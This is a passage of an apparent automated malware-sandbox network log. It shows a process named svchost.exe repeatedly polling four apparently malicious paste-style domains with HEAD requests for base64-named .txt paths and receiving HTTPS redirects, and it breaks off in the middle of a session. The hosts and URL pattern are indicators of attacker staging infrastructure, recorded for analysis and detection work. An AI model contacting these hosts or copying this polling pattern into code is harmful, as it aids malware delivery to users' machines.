                                                              21 | 192.168.2.7 | 49954 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:49.848090887 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.321182013 CET | 856 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bU9p3mYWq96Pp1J1ujo7l2jXPLECZcqxBau6Gn87Qgc2tszdHQF0TKu4EbIzd%2BHASSdYoz4RHaek1OBkqQouIpbBh3Ba7UIzeR0UmUn8KoiyoVurXcKj0N12xjHbgfQS"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc390298b8cad-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1930&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.7 | 49959 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:50.327678919 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.807281971 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCifESbLHsLuau%2BInYLIBZSpwLRW5qA3GbL2jX0IV4EQ3Zw47%2BfaLpsWRg3wECWOvkybhzuRI2E%2FLdJXsau3KinupvWIr%2BM1mWyTS9lfD0gBSNQaPpyCrwRsbh4%2Frfu92zAm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3932cb6437f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1543&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=77&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.7 | 49966 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:50.554229975 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.016730070 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwCewFZoBi9A4TusipxARyzmN%2BDXmZGRooq6J7gyRhW%2BeF2Qg7%2BZU1TIuBjPyjlk3xCOf3UwfuAru%2BkqJp4q6f1HUloa0ANrp793lZVlvIf6MmsKs8VZpCV9egX6pl45ha8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3948a02c33d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1912&rtt_var=956&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.7 | 49968 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:50.813709974 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.290076971 CET | 881 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dH3TE3nKGsx1r%2BkyXiQVvfoKzJmAAPwAGtmnQGnPR91hjtpHZj4NtMK%2F642EX60oqHnwhpK%2FTMt0jb%2BauWYKGLl%2Bx5BmI4NLjufR5540MdF7BVpLoPq4J%2FgbP7EsDSa3xnyA"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39638e742e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.7 | 49970 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:51.023252010 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:51.488451958 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1evzKecjjp67%2BPFhu54SI04Hjc4ynSLx8qSQOhXsZbwwCaymcJA%2BECGWkDYk%2BivC1nqP4fwrznmBoCvMDF9wULXI5fc%2BKXBl9BUglxG3y2WaKpC6vBliT%2BpLWWA%2FcqJa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3977d5c43ed-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.7 | 49980 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:51.513422012 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.037334919 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:51 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARGnsgCLBOmBWOXzzYlP%2BWykhr3ss7PQr1J6r0eh1xoOwXWdhbAn%2F6kizNTkzoYYiAY4WPnsC20cuR%2Fxpx70w91QkjbSBfpUCOgpzqz3lqoqs40h6CmaeeAZJWJ%2ByfbfvkG1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39ade3841d9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.7 | 49982 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:51.832053900 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.293606043 CET | 870 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qH0aRKMuGD72pjJhrjXqraVLwguqGm581XQlaEjskP7rFwptW31Ub9wlX2TekZrqebivzSwamUTIzG14CZZQu6Yh88J1md7%2FzlDhOeFKzw4XjWOSc%2FWY699mMPN15JqPnBs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39c7f237d20-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1944&rtt_var=972&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.7 | 49984 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:52.067549944 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.532346010 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mN4pTVLRDpnUuXJfSSnK1SSSGYxKM9WGmZIe2owaLpor2y5M7cmDoUSw65sw0X5%2BHbo6QTdjl0sLyIsUAQTksZOBFPiT2mtp0xzlEnx1G3gBUPMU%2Fqbrznx6SZwtHt8Y%2FRAf"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39dfdf2c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.7 | 49986 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:52.335328102 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:52.811049938 CET | 867 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:52 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCLw1s1MSU3ULatGBL0kfnrP0kuaKpdsoMSkQeHZ3%2B7V4qKW3coZJ%2B04S7TRfnw5he9U6%2F8O0UzbfGVX0i37syZtmfaSDzjrzIOf4A9%2FU%2BMpUtgX%2Fh9RYAT1jdvDjc7Z"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc39fbdc442aa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2223&min_rtt=2223&rtt_var=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.7 | 49996 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:52.817740917 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.293430090 CET | 867 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5SrXNB%2Bk8Al8M3b3AWxIzu1SDwSDPnNlaq0kAAV9HhsGUJVCPF4rOC1AB2DN59LTwpduOTYITNDM59YgBV3glvumDoh4teMYVAbvcze7U6dfxAn4IyYRvP9YuKk2G20lO3u"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a2bb428c54-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1933&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.7 | 49998 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:53.013351917 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.497879982 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qELYdKYzbfXFy45SfJbV1eL4GFEqZOHYJzRaOaxlVlehtvcluYKvnIUmS9azkQUikNhO4WUXrjdewU05sn5uUDNEAJGeWNqfjaN2xfLhWNOMgig4h5E7hRpn1Pg7mMomZ%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a3f9b25e65-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.7 | 50005 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:53.299988031 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.768282890 CET | 883 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BGmGsAiWrdFEy3NLH053iq9%2BOc0zYSS8NkvpTyvUP%2FQxNAMedCupdlAuEH2GtwNwZ7MS3bDq2hAwJlftIe7Uq%2F26YU49DT9qU42k5S%2BOo5q%2B97c5lt49lV7%2Bk2PKZgGXDzj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a5bb0b7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.7 | 50007 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:53.504475117 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:53.958750963 CET | 860 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:53 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouqNNvEZONHiyCLEmt8Pka9IL6k9nxO%2F3U9yxf7ODZhTuK99v7mHPfMl57ITHtouiddxQMEtZzhBcMv%2BENRVPwkavYdfjB%2FcIoq3I68Yj7xVge5teX4MTjnSh6nkxWdE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a6eeb943d7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.7 | 50012 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:53.965317011 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.421447039 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXRVO8bA0kc6uiHuGpaJkH%2F2gJmQQ55OqjiLTKraM43C%2FeUiRxpUG8yFQpjwJ13yOkQX4sD9BxDyPDOVFQ5DkGYDHwoUEaF7VDERVRmpIOcSOsPGydmvIruEX%2Bv6v8HKdAEa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a9cb640fa5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1470&rtt_var=735&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.7 | 50018 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:54.243134022 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.716919899 CET | 872 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7TSWNTzPTiUd8cM3vv%2BbCfDoHJQ%2FDFyM3BXDjBGdz2oSlFAUVlMj56LOdAlhFmHlRvnZpCSVmIoK6wb1Bgaqp4Np2B61%2F6mTGiSgCgpPOahmDTKCWVWarmZ2hRViuIpX4s%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ab8ce88c95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1844&rtt_var=922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.7 | 50021 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:54.427807093 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.910401106 CET | 881 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IyyCUDD3kZWggbgG%2Baen2DyoDaz2BWIRUyn5wzPlu%2B%2FTQWPyxOuFiI0kVsMi3P8KLKT2r6btIOc74rEbyhzREyHqRiPJwPyu2fKreGExe%2F5%2FXWtaZk9X8Iw%2BQ51LH4WFCKaj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3acef0e7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1946&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.7 | 50023 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:54.734214067 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:55.195628881 CET | 859 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1T8mNlPQ5JAHfdWOEXTnMIsqos2hGCP%2FqkiwSwkhnQeXqEMoG2ZOeBzsy81c7EmTMZjersfADiz90G9h2itik6fpvNhRkeR4ekcbw6pTry4y0s4dmqsIP1YflGThsf%2BX"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ae9b8d42e3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2602&min_rtt=2602&rtt_var=1301&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.7 | 50032 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:55.225296021 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
